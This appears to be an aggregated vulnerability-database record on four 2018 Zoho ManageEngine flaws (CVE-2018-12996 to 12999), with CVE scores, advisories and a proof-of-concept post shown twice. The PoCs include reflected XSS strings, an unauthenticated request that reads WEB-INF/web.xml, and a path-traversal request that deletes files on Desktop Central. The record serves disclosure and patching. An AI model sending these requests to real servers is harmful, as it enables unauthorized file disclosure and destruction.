{"id": "1337DAY-ID-30757", "type": "zdt", "bulletinFamily": "exploit", "title": "Zoho ManageEngine 13 (13790 build) XSS / File Read / File Deletion Vulnerabilities", "description": "Exploit for php platform in category web applications", "published": "2018-07-23T00:00:00", "modified": "2018-07-23T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/30757", "reporter": "Xiaotian Wang", "references": [], "cvelist": ["CVE-2018-12996", "CVE-2018-12999", "CVE-2018-12998", "CVE-2018-12997"], "immutableFields": [], "lastseen": "2018-07-23T14:14:14", "viewCount": 28, "enchantments": {"score": {"value": 0.1, "vector": "NONE"}, "dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2018-1103"]}, {"type": "cve", "idList": ["CVE-2018-12996", "CVE-2018-12997", "CVE-2018-12998", "CVE-2018-12999"]}, {"type": "dsquare", "idList": ["E-663"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148635"]}], "rev": 4}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2018-1103"]}, {"type": "cve", "idList": ["CVE-2018-12996", "CVE-2018-12997", "CVE-2018-12998", "CVE-2018-12999"]}, {"type": "dsquare", "idList": ["E-663"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148635"]}]}, "exploitation": null, "vulnersScore": 0.1}, "sourceHref": "https://0day.today/exploit/30757", "sourceData": "This issue has been reported to the vendor who has already published patches for this issue.\r\nhttps://www.manageengine.com/products/applications_manager/issues.html\r\n\r\n\r\n==========================\r\nAdvisory: Zoho manageengine Applications Manager Reflected XSS Vulnerability\r\nAuthor: M3 From DBAppSecurity\r\nAffected Version: All\r\n==========================\r\nProof of Concept:\r\n==========================\r\n/GraphicalView.do?method=createBusinessService\"scriptalert(5045)/script\r\n\r\n\r\nNotice: It can be successfully reproduced under IE.This issue has been reported to the vendor who has already published patches for this issue.\r\nhttp://opmanager.helpdocsonline.com/read-me\r\n\r\n\r\n==========================\r\nAdvisory:Zoho manageengine Arbitrary File Read in multiple Products\r\nAuthor: M3 From DBAppSecurity\r\nAffected Products:\r\nNetflow Analyzer Network Configuration Manager OpManager Oputils Opmanagerplus firewall analyzer\r\n==========================\r\nProof of Concept:\r\n==========================\r\nPOST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=copyfilefileName=WEB-INF/web.xml HTTP/1.1 Host: 192.168.11.103:8888 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Length: 0 xx\r\n\r\n\r\nNotice: This vul can reproduce without login.This issue has been reported to the vendor who has already published patches for this issue.\r\n\r\n\r\n\r\n\r\n==========================\r\nAdvisory: Zoho manageengine Desktop Central Arbitrary File Deletion\r\nAuthor: M3 From DBAppSecurity\r\nAffected Products:Desktop Central\r\n==========================\r\nProof of Concept:\r\n==========================\r\n\r\n\r\nPOST /agenttrayicon HTTP/1.1 Host: 192.168.1.203:8020 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 129 screenShotAttached=yesvideo_type=2customerId=1computerName=../../../resourceId=xxxfilename=../images/demo/loginas_bottom.gif\r\n\r\n\r\nNotice: This vul can reproduce without login, file deletion is damageable, so use a useless file for test.This issue has been reported to the vendor who has already published patches for this issue.\r\nhttp://opmanager.helpdocsonline.com/read-me\r\n\r\n\r\n==========================\r\nAdvisory: Zoho manageengine Reflected XSS in multiple Products\r\nAuthor: M3 From DBAppSecurity\r\nAffected Products:\r\nNetflow Analyzer Network Configuration Manager OpManager Oputils Opmanagerplus firewall analyzer\r\n==========================\r\nProof of Concept:\r\n==========================\r\n/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111scriptalert(1)/script\r\n\r\n\r\nNotice: This vul can reproduce without login.\n\n# 0day.today [2018-07-23] #", "_state": {"dependencies": 1645517520, "score": 1659800006}, "_internal": {"score_hash": "e5297a627d7149dcc28e5dc6b48ce031"}}
{"packetstorm": [{"lastseen": "2018-07-23T01:54:10", "description": "", "cvss3": {}, "published": "2018-07-22T00:00:00", "type": "packetstorm", "title": "Zoho ManageEngine 13 (13790 build) XSS / File Read / File Deletion", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-12996", "CVE-2018-12999", "CVE-2018-12998", "CVE-2018-12997"], "modified": "2018-07-22T00:00:00", "id": "PACKETSTORM:148635", "href": "https://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html", "sourceData": "`This issue has been reported to the vendor who has already published patches for this issue. \nhttps://www.manageengine.com/products/applications_manager/issues.html \n \n \n========================== \nAdvisory:Zoho manageengine Applications Manager Reflected XSSVulnerability \nAuthor: M3 From DBAppSecurity \nAffected Version: All \n========================== \nProof of Concept: \n========================== \n/GraphicalView.do?method=createBusinessService\"scriptalert(5045)/script \n \n \nNotice: It can be successfully reproduced under IE.This issue has been reported to the vendor who has already published patches for this issue. \nhttp://opmanager.helpdocsonline.com/read-me \n \n \n========================== \nAdvisory:Zoho manageengine Arbitrary File Read in multiple Products \nAuthor: M3 From DBAppSecurity \nAffected Products: \nNetflow Analyzer Network Configuration Manager OpManager Oputils Opmanagerplus firewall analyzer \n========================== \nProof of Concept: \n========================== \nPOST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=copyfilefileName=WEB-INF/web.xml HTTP/1.1 Host: 192.168.11.103:8888 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Length: 0 xx \n \n \nNotice: This vul can reproduce without login.This issue has been reported to the vendor who has already published patches for this issue. \n \n \n \n \n========================== \nAdvisory: Zoho manageengine Desktop Central Arbitrary File Deletion \nAuthor: M3 From DBAppSecurity \nAffected Products:Desktop Central \n========================== \nProof of Concept: \n========================== \n \n \nPOST /agenttrayicon HTTP/1.1 Host: 192.168.1.203:8020 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 129 screenShotAttached=yesvideo_type=2customerId=1computerName=../../../resourceId=xxxfilename=../images/demo/loginas_bottom.gif \n \n \nNotice: This vul can reproduce without login, file deletion is damageable, so use a useless file for test.This issue has been reported to the vendor who has already published patches for this issue. \nhttp://opmanager.helpdocsonline.com/read-me \n \n \n========================== \nAdvisory: Zoho manageengine Reflected XSS in multiple Products \nAuthor: M3 From DBAppSecurity \nAffected Products: \nNetflow Analyzer Network Configuration Manager OpManager Oputils Opmanagerplus firewall analyzer \n========================== \nProof of Concept: \n========================== \n/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111scriptalert(1)/script \n \n \nNotice: This vul can reproduce without login. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/148635/zohome-xssfile.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2022-03-23T12:46:49", "description": "A reflected Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Applications Manager before 13 (Build 13800) allows remote attackers to inject arbitrary web script or HTML via the parameter 'method' to GraphicalView.do.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2018-06-29T12:29:00", "type": "cve", "title": "CVE-2018-12996", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12996"], "modified": "2018-08-20T11:51:00", "cpe": ["cpe:/a:zohocorp:manageengine_applications_manager:13"], "id": "CVE-2018-12996", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-12996", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_applications_manager:13:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:54", "description": "A reflected Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows remote attackers to inject arbitrary web script or HTML via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2018-06-29T12:29:00", "type": "cve", "title": "CVE-2018-12998", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12998"], "modified": "2021-08-31T19:52:00", "cpe": ["cpe:/a:zohocorp:manageengine_netflow_analyzer:-", "cpe:/a:zohocorp:manageengine_opmanager:-", "cpe:/a:zohocorp:firewall_analyzer:-", "cpe:/a:zohocorp:network_configuration_manager:-", "cpe:/a:zohocorp:manageengine_oputils:-"], "id": "CVE-2018-12998", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-12998", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:-:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:-:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_oputils:-:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:network_configuration_manager:-:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:firewall_analyzer:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:50", "description": "Incorrect Access Control in FailOverHelperServlet in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows attackers to read certain files on the web server without login by sending a specially crafted request to the server with the operation=copyfile&fileName= substring.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-06-29T12:29:00", "type": "cve", "title": "CVE-2018-12997", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12997"], "modified": "2021-08-31T19:49:00", "cpe": ["cpe:/a:zohocorp:manageengine_netflow_analyzer:-", "cpe:/a:zohocorp:manageengine_opmanager:-", "cpe:/a:zohocorp:firewall_analyzer:-", "cpe:/a:zohocorp:network_configuration_manager:-", "cpe:/a:zohocorp:manageengine_oputils:-"], "id": "CVE-2018-12997", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-12997", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:-:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:-:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_oputils:-:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:network_configuration_manager:-:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:firewall_analyzer:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:53", "description": "Incorrect Access Control in AgentTrayIconServlet in Zoho ManageEngine Desktop Central 10.0.255 allows attackers to delete certain files on the web server without login by sending a specially crafted request to the server with a computerName=../ substring to the /agenttrayicon URI.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-06-29T12:29:00", "type": "cve", "title": "CVE-2018-12999", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12999"], "modified": "2018-08-20T11:56:00", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central:10.0.255"], "id": "CVE-2018-12999", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-12999", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_desktop_central:10.0.255:*:*:*:*:*:*:*"]}], "dsquare": [{"lastseen": "2021-11-27T02:37:17", "description": "File disclosure vulnerability in ManageEngine Firewall Analyzer, NetFlow Analyzer, Network Configuration Manager, OpManager and OpUtils\n\nVulnerability Type: File Disclosure", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2018-09-18T00:00:00", "type": "dsquare", "title": "ManageEngine Multiple Products File Disclosure", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12997"], "modified": "2018-09-18T00:00:00", "id": "E-663", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:25:42", "description": "An arbitrary file deletion vulnerability exists in Zoho ManageEngine Desktop Central. The vulnerability is due to insufficient input validation in requests handled by AgentTrayIconServlet.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-11-22T00:00:00", "type": "checkpoint_advisories", "title": "Zoho ManageEngine Desktop Central Arbitrary File Deletion (CVE-2018-12999)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12999"], "modified": "2018-12-02T00:00:00", "id": "CPAI-2018-1103", "href": "", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}]}